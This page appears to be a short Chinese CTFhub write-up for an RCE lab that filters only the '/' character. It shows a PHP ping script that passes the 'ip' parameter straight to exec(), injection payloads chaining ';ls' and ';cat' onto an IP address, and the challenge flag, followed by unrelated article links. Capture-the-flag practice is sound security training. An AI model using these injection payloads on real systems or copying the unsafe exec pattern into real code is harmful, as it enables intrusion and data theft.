当前位置: 首页 > news >正文

CTFhub-RCE-过滤目录分隔符 /

news 来源:原创 2024/5/20 2:18:17

根据源代码信息可知,过滤掉了/

<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/\//", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

1. 查看当前目录 127.00.1;ls

2.

127.0.0.1;cd flag_is_here;ls;cat flag_21082715328454.php

ctfhub{32fc4a6e5efacbcfc917e014}

相关文章:

  • 【owt】owt-p2p的vs工程构建
  • Mindomo Desktop for Mac(免费思维导图软件)下载
  • SDL音视频渲染
  • 深度学习之基于YoloV5血红细胞检测识别系统
  • (C语言)输入一个序列,判断是否为奇偶交叉数
  • Python基础入门----如何通过conda搭建Python开发环境
  • 学习笔记5——对象、直接内存、执行引擎,string
  • 猫罐头哪个牌子好?分享十款猫罐头品牌排行榜!
  • three.js相机调用reset方法复原但无法完全复原
  • 21、Flink 的table API与DataStream API 集成(2)- 批处理模式和inser-only流处理
  • endnote20如何导入已经下载好的ris和pdf文件
  • 【安卓13】谷歌原生桌面launcher3 禁止桌面图标拖拽和所有应用拖拽
  • 怎么去掉邮件内容中的回车符
  • 【JavaEE】Servlet API 详解(HttpServletRequest类)
  • Java进阶API第三章
  • 【跃迁之路】【641天】程序员高效学习方法论探索系列(实验阶段398-2018.11.14)...
  • 11111111
  • Java 实战开发之spring、logback配置及chrome开发神器(六)
  • MYSQL 的 IF 函数
  • PHP那些事儿
  • Promise面试题2实现异步串行执行
  • spring boot下thymeleaf全局静态变量配置
  • TCP拥塞控制
  • 京东美团研发面经
  • 面试遇到的一些题
  • 协程
  • Semaphore
  • ​​快速排序(四)——挖坑法,前后指针法与非递归
  • ​LeetCode解法汇总2304. 网格中的最小路径代价
  • #include
  • (16)Reactor的测试——响应式Spring的道法术器
  • (附源码)ssm跨平台教学系统 毕业设计 280843
  • (附源码)流浪动物保护平台的设计与实现 毕业设计 161154
  • (机器学习的矩阵)(向量、矩阵与多元线性回归)
  • (新)网络工程师考点串讲与真题详解
  • (学习日记)2024.02.29:UCOSIII第二节
  • (学习日记)2024.03.25:UCOSIII第二十二节:系统启动流程详解
  • (转)h264中avc和flv数据的解析
  • (转)PlayerPrefs在Windows下存到哪里去了?
  • .【机器学习】隐马尔可夫模型(Hidden Markov Model,HMM)
  • .cfg\.dat\.mak(持续补充)
  • .NET Core 通过 Ef Core 操作 Mysql
  • .Net CoreRabbitMQ消息存储可靠机制
  • .net 前台table如何加一列下拉框_如何用Word编辑参考文献
  • .NET关于 跳过SSL中遇到的问题
  • .NET值类型变量“活”在哪?
  • .skip() 和 .only() 的使用
  • [4.9福建四校联考]
  • [ActionScript][AS3]小小笔记
  • [acwing周赛复盘] 第 94 场周赛20230311
  • [Android学习笔记]ScrollView的使用
  • [BJDCTF 2020]easy_md5
  • [BZOJ1089][SCOI2003]严格n元树(递推+高精度)
  • [C++参考]拷贝构造函数的参数必须是引用类型
  • [LaTex]arXiv投稿攻略——jpg/png转pdf